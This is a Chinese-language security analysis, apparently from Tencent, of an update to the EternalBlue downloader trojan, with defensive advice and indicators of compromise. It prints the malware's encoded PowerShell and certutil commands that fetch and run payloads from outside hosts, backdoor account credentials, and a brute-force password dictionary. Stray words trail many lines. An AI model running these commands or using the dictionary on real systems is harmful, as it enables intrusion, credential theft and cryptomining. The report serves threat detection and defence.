https://weibo.com/ttarticle/p/show?id=2309404344350225132710
永恆之藍下載器木馬又雙叒叕升級了新的攻擊方式html
背景web
騰訊安全御見威脅情報中心於2019年2月25日發現曾利用驅動人生公司升級渠道發起供應鏈攻擊的永恆之藍下載器木馬再次更新。這次更新仍然在攻擊模塊,在此前新增MS SQL爆破攻擊的基礎上,更新爆破密碼字典,而後將使用mimiktaz蒐集登陸密碼並添加到字典,並利用該字典進行SMB爆破攻擊、MS SQL爆破攻擊。同添加了永恆之藍漏洞攻擊後木馬啓動代碼、攻擊進程執行狀態檢查代碼,並嘗試對木馬文件添加簽名認證。sql
這個「永恆之藍」木馬下載器黑產團伙自供應鏈攻擊得手以後,一直很活躍,期間不斷更新調整木馬攻擊方式,蠕蟲式傳播的特色不斷加強。shell
如下是該團伙主要活動狀況的時間線:安全
2018年12月14日服務器
利用「驅動人生」系列軟件升級通道下發,利用「永恆之藍」漏洞攻擊傳播。less
2018年12月19日函數
下發以後的木馬新增PowerShell後門安裝。工具
2019年1月09日ui
檢測到挖礦組件xmrig-32.mlz/xmrig-64.mlz下載。
2019年1月24日
木馬將挖礦組件、升級後門組件分別安裝爲計劃任務,並同時安裝PowerShell後門。
2019年1月25日 木馬在1月24日的基礎上再次更新,將攻擊組件安裝爲計劃任務,在攻擊時新增利用mimikatz蒐集登陸密碼,SMB弱口令爆破攻擊,同時安裝PowerShell計劃任務和hta計劃任務。
2019年2月10日
將攻擊模塊打包方式改成Pyinstaller.
2019年2月20日
更新礦機組件,下載釋放XMRig礦機,以獨立進程啓動挖礦。
2019年2月23日
攻擊方法再次更新,新增MS SQL爆破攻擊。
2019年2月25日
在2月23日基礎上繼續更新,更新MS SQL爆破攻擊時密碼字典,添加樣本文件簽名。至此攻擊方法集成永恆之藍漏洞攻擊、SMB爆破攻擊、MsSQL爆破攻擊,同時使用黑客工具mimiktaz、psexec進行輔助攻擊。
1、樣本信息
Md5:0a4dcd170708f785f314c16797baaddb
文件路徑:C:\Windows\Temp\svchost.exe
計劃任務:DnsScan
文件數字簽名:「Shenzhen Smartspace Software technology Co.,Limited」
2、樣本分析
主程序代碼長度對比:2月23日更新後爲1886行,2月25日更新後爲1909行。
(新增代碼1)爆破時使用密碼字典新增密碼:
'4yqbm4,m`~!@~#$%^&*(),.;'
'A123456'
使用mimiktaz蒐集登陸密碼並添加到該密碼字典中
利用該密碼字典進行SMB爆破攻擊
利用該密碼字典進行MsSQL爆破攻擊,攻擊成功後添加帳戶:k8h3d,修改MsSQL超級管理員密碼爲: 「ksa8hd4,m@~#$%^&*()」,並將經過MS SQL程序及1433端口進入計算機的防火牆規則設置爲容許經過
MsSQL爆破成功後安裝Bluetooths計劃任務執行powershelll後門:
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="(解密字符:powershell -ep bypass –e IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN))
同時經過Certutil命令下載母體木馬植入:
certutil -urlcache -split -f hxxp://dl.haqo.net/dll.exe?fr=MS SQL c:\\setupinstalled.exe&&c:\\setupinstalled.exe
(新增代碼2)在永恆之藍漏洞攻擊之成功而且植入木馬後,添加經過服務方式啓動植入木馬installed.exe的代碼
(新增代碼3)添加並執行函數eb(),檢查攻擊模塊執行狀態
安全建議
1.服務器暫時關閉沒必要要的端口(如13五、13九、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
2.服務器使用高強度密碼,切勿使用弱口令,防止黑客暴力破解;
3.使用殺毒軟件攔截可能的病毒攻擊;
4.推薦企業用戶部署騰訊御界高級威脅檢測系統防護可能的黑客攻擊。御界高級威脅檢測系統,是基於騰訊安全反病毒實驗室的安全能力、依託騰訊在雲和端的海量數據,研發出的獨特威脅情報和惡意檢測模型系統。
IOCs
Md5
0a4dcd170708f785f314c16797baaddb
弱密碼字典
123456,
password,
qwerty,
12345678,
123456789,
123,
1234,
123123,
12345,
12345678,
123123123,
1234567890,
88888888,
111111111,
000000,
111111,
112233,
123321,
654321,
666666,
888888,
a123456,
123456a,
5201314,
1qaz2wsx,
1q2w3e4r,
qwe123,
123qwe,
a123456789,
123456789a,
baseball,
dragon,
football,
iloveyou,
password,
sunshine,
princess,
welcome,
abc123,
monkey,
!@#$%^&*,
charlie,
aa123456,
Aa123456,
admin,
homelesspa,
password1,
1q2w3e4r5t,
qwertyuiop,
1qaz2wsx,
sa,
sasa,
sa123,
sql2005,
1,
admin@123,
sa2008,
1111,
passw0rd,
abc,
abc123,
abcdefg,
sapassword,
Aa12345678,
ABCabc123,
sqlpassword,
1qaz2wsx,
1qaz!QAZ,
sql2008,
ksa8hd4,m@~#$%^&*(),
4yqbm4,m`~!@~#$%^&*(),.; ,
4yqbm4,m`~!@~#$%^&*(),.;,
A123456